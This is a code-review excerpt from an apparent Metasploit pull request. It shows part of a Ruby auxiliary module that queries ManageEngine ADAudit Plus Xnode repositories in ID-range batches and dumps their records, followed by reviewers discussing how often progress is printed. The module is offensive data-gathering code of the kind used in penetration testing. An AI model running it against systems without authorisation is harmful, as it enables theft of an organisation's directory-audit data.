modules/auxiliary/gather/manageengine_adaudit_plus_xnode_enum.rb

```diff
@@ -0,0 +1,242 @@
+
+      print_good("Data repository #{repo} contains #{total_hits} records with ID numbers between #{aggr_min} and #{aggr_max}.")
+
+      repo_record_info_hash[repo] = {
+        'total_hits' => total_hits.to_i,
+        'aggr_min' => aggr_min.to_i,
+        'aggr_max' => aggr_max.to_i
+      }
+    end
+
+    # check if we found any repositories that contained any data
+    return if repo_record_info_hash.empty?
+
+    if dump_all
+      data_to_dump = ad_audit_plus_data_repos
+    else
+      data_to_dump = grab_config(config_file)
+
+      case data_to_dump
+      when config_status::CONFIG_FILE_DOES_NOT_EXIST
+        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file} because this file does not exist. Please correct your 'CONFIG_FILE' setting or set 'DUMP_ALL' to true.")
+      when config_status::CANNOT_READ_CONFIG_FILE
+        fail_with(Failure::BadConfig, "Unable to read #{config_file}. Check if your 'CONFIG_FILE' setting is correct and make sure the file is readable and properly formatted.")
+      when config_status::DATA_TO_DUMP_EMPTY
+        fail_with(Failure::BadConfig, "The #{config_file} does not seem to contain any data repositories and fields to dump. Please fix your configuration or set 'DUMP_ALL' to true.")
+      when config_status::DATA_TO_DUMP_WRONG_FORMAT
+        fail_with(Failure::BadConfig, "Unable to obtain the Xnode data repositories to target from #{config_file}. Check if your 'CONFIG_DIR' setting is correct or set 'DUMP_ALL' to true.")
+      end
+    end
+
+    # try and dump the database tables Xnode has access to
+    data_to_dump.each do |repo, fields|
+      if fields.blank? && !dump_all
+        print_error("Unable to obtain any fields for the data repository #{repo} to query. Skipping this table. Check your config file for this module if this is unintended behavior.")
+        next
+      end
+
+      # check if we actually found any records for the repo
+      next unless repo_record_info_hash.include?(repo)
+
+      total_hits = repo_record_info_hash[repo]['total_hits']
+      id_range_lower = repo_record_info_hash[repo]['aggr_min']
+      id_range_upper = id_range_lower + 9
+      max_id = repo_record_info_hash[repo]['aggr_max']
+      query_ct = 0
+
+      results = []
+      print_status("Attempting to request #{total_hits} records for data repository #{repo} between IDs #{id_range_lower} and #{max_id}. This could take a while...")
+      hit_upper_limit = false
+      until hit_upper_limit
+        # build a custom query for the unique_id range
+        custom_query = { 'query' => "UNIQUE_ID:[#{id_range_lower} TO #{id_range_upper}]" }
+        query = action_dr_search(repo, fields, custom_query)
+        res_code, res = get_response(@sock, query)
+        partial_results = process_dr_search(res, res_code, repo, fields)
+        results += partial_results unless partial_results.nil?
+
+        query_ct += 1
+        if query_ct % 25 == 0
```

Comment:
So basically every 250 record IDs. Doesn't this seem a little high?

Reply:
I made it this high on purpose because the queries are normally performed very quickly and real world instances are likely to have tens of thousands of records, but I'm totally fine with lowering this to like every 100 IDs.

Reply:
Alright lowered it down in https://github.com/rapid7/metasploit-framework/pull/16725/commits/323f2790932128a41b41ad1fddfa3fc1428f7a58